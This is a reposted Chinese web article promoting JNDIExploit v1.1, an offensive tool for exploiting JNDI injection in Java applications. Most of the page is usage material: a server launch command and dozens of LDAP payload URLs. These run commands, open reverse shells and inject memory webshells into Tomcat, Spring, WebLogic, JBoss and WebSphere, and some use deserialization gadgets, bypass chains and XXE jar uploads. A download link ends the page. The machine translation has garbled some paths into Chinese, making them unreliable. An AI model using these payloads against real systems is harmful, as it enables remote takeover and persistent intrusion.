【JNDI注入利用工具】JNDIExploit v1.1

【JNDI注入利用工具】JNDIExploit v1.1# 简介
JNDIExploit一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,集成了JDNI注入格式&#xff0

# 简介

JNDIExploit是JNDI注入和利用的工具。它引用/引用了Rogue JNDI项目的大量代码,打开服务器后可以更方便地使用。集成了绕过更高版本JDK的常用方法,适合用在直接内存嵌入、shell等自动化工具中。

详细使用文档:JNDIExploit/README.md

# 相关截图

# 快速使用

##服务端

快速打开JNDIExploit服务器,默认开放LDAP服务端口1389和HTTP服务端口3456,并绑定导出IP。

我们建议使用JDK8 来启用此服务。否则,服务器在使用LDAP 时可能会报错。

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 退出IP

##客户端(注入端)

在服务器上键入命令java -jar JNDIExploit-1.3-SNAPSHOT.jar -u 以查看支持的JNDI 注入格式,或查看以下列表。

支持的LADP 查询

* 发送到LDAP 服务器时,所有单词不区分大小写。

[+] 基本查询: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params],例如:

ldap://127.0.0.1:1389/基本/Dnslog/[域名]

ldap://127.0.0.1:1389/基本/命令/[cmd]

ldap://127.0.0.1:1389/基本/命令/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] —Windows不支持

ldap://127.0.0.1:1389/基本/TomcatEcho

ldap://127.0.0.1:1389/基本/SpringEcho

ldap://127.0.0.1:1389/基本/WeblogicEcho

ldap://127.0.0.1:1389/基本/TomcatMemshell1

ldap://127.0.0.1:1389/Basic/TomcatMemshell2 —需要附加标头[Shell: true]

ldap://127.0.0.1:1389/基本/JettyMemshell

ldap://127.0.0.1:1389/基本/WeblogicMemshell1

ldap://127.0.0.1:1389/基本/WeblogicMemshell2

ldap://127.0.0.1:1389/基本/JBossMemshell

ldap://127.0.0.1:1389/基本/WebsphereMemshell

ldap://127.0.0.1:1389/基本/SpringMemshell

[+] 反序列化Queries: ldap://127.0.0.1:1389/反序列化/[GadgetType]/[PayloadType]/[Params],例如:

ldap://127.0.0.1:1389/反序列化/URLDNS/[域]

ldap://127.0.0.1:1389/反序列化/CommonsCollectionsK1/Dnslog/[域]

ldap://127.0.0.1:1389/反序列化/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] —Windows不支持

ldap://127.0.0.1:1389/反序列化/CommonsBeanutils2/TomcatEcho

ldap://127.0.0.1:1389/反序列化/C3P0/SpringEcho

ldap://127.0.0.1:1389/反序列化/Jdk7u21/WeblogicEcho

ldap://127.0.0.1:1389/反序列化/Jre8u20/TomcatMemshell1

ldap://127.0.0.1:1389/反序列化/CVE_2020_2555/WeblogicMemshell1

ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2 —也支持其他memshell

[+] Tomcat绕过查询

ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[域]

ldap://127.0.0.1:1389/TomcatBypass/命令/[cmd]

ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] —Windows不支持

ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho

ldap://127.0.0.1:1389/TomcatBypass/SpringEcho

ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1

ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2 —需要附加标头[Shell: true]

ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[+] GroovyBypass 查询

ldap://127.0.0.1:1389/GroovyBypass/命令/[cmd]

ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[+] Websphere绕过查询

ldap://127.0.0.1:1389/WebsphereBypass/List/file=[文件或目录]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[域]

ldap://127.0.0.1:1389/WebsphereBypass/upload/command/[cmd]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] —不支持Windows

ldap://127.0.0.1:1389/WebsphereBypass/上传/WebsphereMemshell

ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] —-e.g:/././././tmp/jar_cache7808167489549525095.tmp

当前支持的所有PayloadType 为:

Dnslog:与DNSLog平台配合使用,当命令包含特殊字符时执行命令。 ReverseShell: 是Linux 系统上使用的反弹shell。 TomcatEcho: 用于当中间件为Tomcat时回显命令执行结果。添加自定义headercmd: whoami 方法并向其传递您要运行的命令。 SpringEcho: 用于回显命令。如果框架是SpringMVC/SpringBoot,则传递要执行的命令。如果中间件是Weblogic,则使用whoami添加自定义headercmd:并传递要执行的命令。 Whoami.TomcatMemshell1:用于注入Tomcat内存shell,支持Behiner shell和Basic cmd shell。 TomcatMemshell2:用于支持Tomcat内存shell,必须添加额外的HTTP HeaderShell: SpringMemshell: 用于嵌入Spring 内存shell,支持Behiner shell 和基本cmd shell WeblogicMemshell1: 用于嵌入Weblogic 内存shell,支持Behiner shell 和基本cmd shell WeblogicMemshell2: 用于嵌入Weblogic 内存shell 使用并支持Behind。 shell 和基本的cmd shell。我们推荐这种方法。 JettyMemshell:用于嵌入Jetty内存shell,支持Behiner shell和Basic cmd shell。 JBossMemshell:用于嵌入JBoss内存shell,支持Behiner shell和Basic cmd shell。 WebsphereMemshell: 用于嵌入Websphere内存shell并支持: Behinder shell 和Basic cmd shell 都是shell 当前支持的GadgetType。

URLDNSCommonsBeanutils1CommonsBeanutils2CommonsCollectionsK1CommonsCollectionsK2C3P0Jdk7u21Jre8u20CVE_2020_2551CVE_2020_2883WebsphereBypass 的三个操作:

列表:根据XXE显示目标服务器上的目录或文件内容。 上传:根据XXE jar协议将恶意jar包上传到目标服务器的临时目录。

# 下载

恭喜您发现了这个宝石般的网站。您可以点击它并查看。你不会后悔的!

[JNDI注入利用工具] JNDIExploit v1.1 – Tokiren GetShell (get-shell.com)https://get-shell.com/4004.html

#【JNDI注入漏洞工具】以上JNDIExploit v1.1相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92815.html

Like (0)
CSDN的头像CSDN
Previous 2024年7月4日
Next 2024年7月4日

相关推荐

  • LINUX BIN软件包安装方法

    BIN软件包安装方法如下:1,打开BIN安装包属性,把文件权限修改为可读写权限,同时允许作为程序执行。2,在Linux终端下输入BIN安装包绝对路径外加CHMO

    2024年9月19日
    0
  • 2M的软件能做什么?

    今天为大家介绍的是一款,搜索软件 everything。Everything是voidtools开发的一款文件搜索工具,官网描述为“基于名称实时定位文件和目录(

    2024年8月30日
    0
  • Excel升级版Access没那么好用了

    微软Office是使用最为广泛的办公软件,Excel则是其中集电子表格、数据处理、图表统计多为一体的生产力工具,每个工作领域几乎都能看到这款软件身影。然而随着互

    2024年9月18日
    0
  • 自动发卡平台行业分析

    自动发卡平台是应用于在线点卡支付充值自动完成兑换游戏里虚拟物品,各类游戏点卡,软件注册码等新一代自动化系统,采用最简单、便捷的接入方式达到网络游戏的轻松运营,是

    2024年9月22日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注